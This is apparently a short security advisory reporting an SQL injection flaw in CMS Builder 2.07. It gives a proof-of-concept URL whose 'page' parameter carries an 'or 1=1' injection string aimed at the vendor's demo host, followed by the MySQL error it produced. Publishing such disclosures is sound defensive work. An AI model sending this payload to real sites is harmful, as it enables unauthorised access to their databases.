CMS Builder 2.07 SQL Injection

2015.03.28

Credit: Provensec

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Affected software: CMS Builder v2.07
# Type of vulnerability: sql injection
# URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php
# Discovered by: Provensec
# Website: http://www.provensec.com

#versionv2.07
# Proof of concept

http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload


demo:->

http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y



MySQL Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'-25' at line 9

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

CMS Builder 2.07 SQL Injection

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

CMS Builder 2.07 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.